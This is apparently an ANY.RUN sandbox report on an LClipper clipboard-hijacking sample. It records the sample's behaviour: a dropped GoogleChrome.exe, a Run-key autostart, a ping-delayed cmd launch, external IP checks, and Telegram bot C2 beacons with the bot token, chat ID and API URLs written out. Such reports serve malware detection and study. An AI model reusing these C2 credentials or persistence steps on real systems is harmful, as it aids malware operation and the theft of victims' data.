Malware analysis SecuriteInfo.com.Win64.MalwareX-gen.6869.2505 Malicious activity

Add for printing

File name:	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505
Full analysis:	https://app.any.run/tasks/09e2323e-ab92-4f98-9e4f-9009a4ad3806
Verdict:	Malicious activity
Analysis date:	June 26, 2025, 04:49:55
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	evasion lclipper clipper auto-reg telegram ip-check ims-api generic
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:	E8C399A261B2B3B978C789E0C3D77D65
SHA1:	223FB0B1CAF5D3CA38F87E82F235C6310D3476F0
SHA256:	DA1A5FB86D21C58F2483F9AF83BF9196053C981606F1A74D5D47C23D843D8F41
SSDEEP:	6144:1Aj4wrEv8vmxmmNO09kEfz+meUACAhDx:1Aj4Hv8vn4O09kEfz+OAJDx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- LCLIPPER mutex has been found
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
  - GoogleChrome.exe (PID: 5896)
- Changes the autorun value in the registry
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
- LCLIPPER has been detected (YARA)
  - GoogleChrome.exe (PID: 6412)
SUSPICIOUS
- Executable content was dropped or overwritten
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
- Reads security settings of Internet Explorer
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 5896)
  - GoogleChrome.exe (PID: 6412)
- Application launched itself
  - cmd.exe (PID: 72)
- Starts CMD.EXE for commands execution
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - cmd.exe (PID: 72)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 3640)
- The executable file from the user directory is run by the CMD process
  - GoogleChrome.exe (PID: 6412)
- Checks for external IP
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - svchost.exe (PID: 2200)
  - GoogleChrome.exe (PID: 6412)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)
  - GoogleChrome.exe (PID: 6412)
- There is functionality for capture public ip (YARA)
  - GoogleChrome.exe (PID: 6412)
- Possible usage of Discord/Telegram API has been detected (YARA)
  - GoogleChrome.exe (PID: 6412)
INFO
- Reads the computer name
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
  - GoogleChrome.exe (PID: 5896)
- Reads the machine GUID from the registry
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
  - GoogleChrome.exe (PID: 5896)
- Checks supported languages
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
  - GoogleChrome.exe (PID: 5896)
- Checks proxy server information
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
  - GoogleChrome.exe (PID: 5896)
  - slui.exe (PID: 2148)
- Creates files or folders in the user directory
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
- Reads the software policy settings
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
  - GoogleChrome.exe (PID: 6412)
  - GoogleChrome.exe (PID: 5896)
  - slui.exe (PID: 2148)
- Launching a file from a Registry key
  - SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe (PID: 3100)
- Manual execution by a user
  - GoogleChrome.exe (PID: 5896)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

ims-api

(PID) Process(6412) GoogleChrome.exe

Telegram-Tokens (1)7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

Telegram-Info-Links

7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

Get info about bothttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getMe

Get incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getUpdates

Get webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML HTTP/1.1jA

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML HTTP/1.1

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML HTTP/1.1 User-Agent: ClpBot Host: api.telegram.org Cache-Control: no-cache

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (87.3)
.exe	\|	Generic Win/DOS Executable (6.3)
.exe	\|	DOS Executable Generic (6.3)

EXIF

EXE

MachineType:	AMD AMD64
TimeStamp:	2025:06:24 19:36:11+00:00
ImageFileCharacteristics:	Executable, Large address aware
PEType:	PE32+
LinkerVersion:	14.44
CodeSize:	146944
InitializedDataSize:	95232
UninitializedDataSize:	-
EntryPoint:	0x94ac
OSVersion:	6
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

145

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

C:\WINDOWS\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\admin\AppData\Local\GoogleChrome.exe"

C:\Windows\System32\cmd.exe

—

SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll

2148

C:\WINDOWS\System32\slui.exe -Embedding

C:\Windows\System32\slui.exe

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Activation Client

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

2200

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

2324

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3100

"C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe"

C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe

explorer.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\securiteinfo.com.win64.malwarex-gen.6869.2505.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

3640

cmd /C "ping localhost -n 1 && start C:\Users\admin\AppData\Local\GoogleChrome.exe"

C:\Windows\System32\cmd.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll

3756

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5896

C:\Users\admin\AppData\Local\GoogleChrome.exe

explorer.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\local\googlechrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll

6412

C:\Users\admin\AppData\Local\GoogleChrome.exe

cmd.exe

User:

admin

Integrity Level:

MEDIUM

Modules

Images
c:\users\admin\appdata\local\googlechrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

ims-api

(PID) Process(6412) GoogleChrome.exe

Telegram-Tokens (1)7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

Telegram-Info-Links

7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

Get info about bothttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getMe

Get incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getUpdates

Get webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML HTTP/1.1jA

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML HTTP/1.1

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

chat_id (1)6299414420

text (1)New connection!

parse_mode (1)HTML HTTP/1.1 User-Agent: ClpBot Host: api.telegram.org Cache-Control: no-cache

Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU

End-PointsendMessage

Args

6516

ping localhost -n 1

C:\Windows\System32\PING.EXE

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

TCP/IP Ping Command

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\mswsock.dll

Add for printing

Total events

3 440

Read events

3 422

Write events

Delete events

Modification events


(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(3100) SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	Chromium
Value: C:\Users\admin\AppData\Local\GoogleChrome.exe
(PID) Process:	(6412) GoogleChrome.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(6412) GoogleChrome.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4D1ED785E3365DE6C966A82E99CCE8EA_4FF21E9CE9761A304E66D2F0263F90A7		binary
		MD5:8C838CE35CA7EF9D91FAE32FF9C5A97A	SHA256:B6BA710642577ADC4E74144273370C4082ACB56CBD7A0151AA925F0868ACA945
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619		binary
		MD5:8468FCDF3E07DF621EF9323042486881	SHA256:B5CE4D7BC82D8174A6A90237EE4EB8A02A22F86F521D9D886080FAFFA019BE0F
6412	GoogleChrome.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D		binary
		MD5:09090E6328F9A582812F78C9D0FF8840	SHA256:F428B57D62CE2E7EC61A7CBBACE66F4A53F3C26A916AD171434CB4ECE590C70E
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4D1ED785E3365DE6C966A82E99CCE8EA_4FF21E9CE9761A304E66D2F0263F90A7		binary
		MD5:6F5D15ACA33772C22D9310674CB3E6E3	SHA256:FC540B70DA45B3C20A4BBD6066BA648E782D3D5DBB47D88E2A15E44848B6A8CC
6412	GoogleChrome.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D		binary
		MD5:0BB8423EFAB4D3CC9B2CF4A9D8D340BE	SHA256:1E6A6FCC9E64A8DFBFF0A21468736FBAB683885E8EC73C0FDDA658378FA24C61
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619		binary
		MD5:49FFFBF9D64155EC7392602026C55FD9	SHA256:4AB0F69F158CC3C21EF670C41320BC0EDBE255AFB3E608B122DE434F703D03D6
6412	GoogleChrome.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ACA7D89F79C6EF86F63EB2FF5D5C876A_8AD14988285EE6F6CBBCCEE3BD7C8E58		binary
		MD5:3D31471057E7EA64703404309C8EB8EC	SHA256:F751F9B4C36B18FFD45606D2B87BF4BE6BCC7C65A721A5BED5355D7310461C8F
6412	GoogleChrome.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771		binary
		MD5:F7B0468A132A74DC778F16963DCC9175	SHA256:9D54CD6B33227B498D1EA28FAC17AD77D62F8BFAA5180B4817DF616A6A3B8568
6412	GoogleChrome.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771		binary
		MD5:882B6ACF2CBA302D0E0E25941B48311E	SHA256:0CB85D6332C4AF4A3E55D4C986DC45441C84AFAD530D4D693D8117F36FEA92D7
6412	GoogleChrome.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACA7D89F79C6EF86F63EB2FF5D5C876A_8AD14988285EE6F6CBBCCEE3BD7C8E58		binary
		MD5:A266DA74E3BAD27C740CA22AFE2870DB	SHA256:A0D53C4D7ED66AC4BF1C91D8F1187ACAF09F34E1A6F6AA4BADF3D42EEC209201

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	GET	200	2.17.190.73:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D	unknown	—	—	whitelisted
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	GET	200	2.17.190.73:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJ9L2KGL92BpjF3kAtaDtxauTmhgQUPdNQpdagre7zSmAKZdMh1Pj41g8CEAkYRDeSr3%2FByrQh0es68D8%3D	unknown	—	—	whitelisted
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	GET	200	208.95.112.1:80	http://ip-api.com/line/	unknown	—	—	whitelisted
6412	GoogleChrome.exe	GET	200	208.95.112.1:80	http://ip-api.com/line/	unknown	—	—	whitelisted
6412	GoogleChrome.exe	GET	200	192.124.249.24:80	http://ocsp.godaddy.com//MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D	unknown	—	—	whitelisted
6412	GoogleChrome.exe	GET	200	192.124.249.24:80	http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D	unknown	—	—	whitelisted
6412	GoogleChrome.exe	GET	200	192.124.249.24:80	http://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CCEVy5zGFpEO7	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	69.192.161.161:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
2044	SIHClient.exe	GET	200	69.192.161.161:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
5944	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
1268	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
2140	RUXIMICS.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	185.166.143.48:443	bitbucket.org	AMAZON-02	NL	whitelisted
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	2.17.190.73:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	208.95.112.1:80	ip-api.com	TUT-AS	US	whitelisted
6412	GoogleChrome.exe	185.166.143.48:443	bitbucket.org	AMAZON-02	NL	whitelisted
6412	GoogleChrome.exe	208.95.112.1:80	ip-api.com	TUT-AS	US	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	4.231.128.59	whitelisted
google.com	142.250.186.46	whitelisted
bitbucket.org	185.166.143.48 185.166.143.50 185.166.143.49	whitelisted
ocsp.digicert.com	2.17.190.73	whitelisted
ip-api.com	208.95.112.1	whitelisted
api.telegram.org	149.154.167.220	whitelisted
